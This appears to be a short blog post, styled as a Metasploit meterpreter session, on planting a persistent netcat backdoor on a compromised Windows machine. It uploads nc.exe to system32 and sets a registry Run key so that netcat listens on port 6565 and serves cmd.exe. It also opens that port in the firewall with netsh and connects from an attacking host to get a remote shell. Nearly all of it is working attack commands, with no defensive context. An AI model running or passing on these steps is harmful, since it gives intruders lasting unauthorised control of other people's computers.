meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 6565 -e cmd.exe
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
meterpreter > execute -f cmd -i
C:\Documents and Settings\bloggins\My Documents > netsh firewall show opmode
C:\Documents and Settings\bloggins\My Documents > netsh firewall add portopening TCP 6565 "Service Firewall" ENABLE ALL
C:\Documents and Settings\bloggins\My Documents > netsh firewall show portopening
reboot the remote system and test out the netcat shell.
root@bt:~# nc -v 172.16.104.128 6565
No comments:
Post a Comment